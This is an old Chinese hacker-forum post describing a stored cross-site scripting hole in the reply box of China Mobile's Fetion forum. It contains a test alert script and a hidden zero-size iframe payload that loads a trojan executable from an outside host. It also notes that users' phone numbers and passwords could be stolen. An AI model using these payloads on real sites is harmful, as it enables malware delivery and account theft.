|
 | 作者: System_Error [yyy30876]
 论坛用户 |
登录 |
  原创:关于移动公司“飞信“论坛的跨站利用原理 【提交日期】 2006年11月10日(今天是国际华商文化节) 【破解作者】 yyy30876 【作者邮箱】 yyy30875@126.com 【作者主页】 暂无 【使用工具】 BAIDU / JAVA 【破解平台】 Win/XP 【实践地点】 http://www.fetion.com.cn/Forums/ 【实践用时】 30分钟 【具体细节】 原理讲解文章,无具体实践步骤! 【文章声明】 我是一只小菜鸟,偶得一点心得,愿与大家分享!本文章出处为www.wolfexp.net 如转载请注明文章来源,谢谢合作! 今天,去了移动公司的飞信网站去下飞信(这东西发短息不要钱!) 顺便去了他的论坛,前几天没去是因为网速的原因(现在有这么好的网速,说什么也要在红狼狂罐水,希 望老大不要收 我费啊 !) 然后随便点了个主题 在回复的时候发现可以提交html 如图1: 忽然想起以前咱红狼不是有很多 跨站的文章吗,所以我就翻了出来,然后随便回复了个: <script>alert("fhod")</script> // 看了这个语句大家想起来是谁的文章了把! 居然发现可以成功!汗,然后接着在BAIDU上找了个: <iframe height=0 width=0 src="http://www.baidu.com/木马.exe"></iframe> 具体如图2: 这个就不用我介绍了把,很简单 的在回复里面加了个木马! 还有更近一步的发展,那就是在回复的时候以HTML格式加入个网页框架,其高度和宽度都是0,意思就是 不显示!嘿嘿 这个就要看你的网页木马做的精致和功能问题了! 这个你不就可以偷窥别人隐私了,本人不赞同这样做,也没有这样做过,理论而已! 下面来欣赏下别人的劳动: http://www.baidu.com/s?wd=%BF%E7%D5%BE+%CA%B5%C0%FD&cl=3 注:此网站的登陆用户全部为真实手机用户,你只要获取其中的手机号码和密码,便可使用“飞信”来当 成自己的手机使用,可是要犯罪的!可不要做坏事情啊! 期待红狼完成对移动“飞信”的具体检测!来增加咱这里的威望!西西 其实本人写此文章并非说明什么技术问题,而是寻找几位跨站高手,来带带小弟QQ:444543400,本人先 学习JAVA初期,且真是技术太菜......... 欢迎大家指点批评,如有高手请补充下文! [此贴被 System_Error(yyy30876) 在 11月10日13时05分 编辑过] |
| 地主 发表时间: 06-11-10 13:04 |
| 回复: System_Error [yyy30876] 论坛用户 |
登录 |
 |
| B1层 发表时间: 06-11-10 13:06 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 原创:关于移动公司“飞信“论坛的跨站利用原理